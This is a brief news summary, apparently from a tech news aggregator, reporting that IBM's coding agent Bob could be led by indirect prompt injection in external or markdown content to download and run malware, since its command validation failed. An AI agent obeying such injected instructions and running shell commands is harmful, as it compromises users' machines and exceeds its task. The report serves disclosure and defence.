IBM Bob Enables Malware Execution via Prompt Injection

Cybersecurity researchers in late 2025 reported that IBM’s AI coding agent Bob can be tricked into downloading and executing malware via indirect prompt injection. Controlled tests by PromptArmor and reporting from The Register and TechRadar show Bob’s command validation fails when parsing external or markdown sources, allowing shell commands to run. The flaw raises enterprise risks and prompts calls for sandboxing, multi-layer validation, and human review.
Scoring Rationale
High novelty and industry-wide impact driven by real exploit demonstrations, limited by lack of official IBM disclosure and full technical details.
Practice interview problems based on real data
1,500+ SQL & Python problems across 15 industry datasets — the exact type of data you work with.
Try 250 free problems


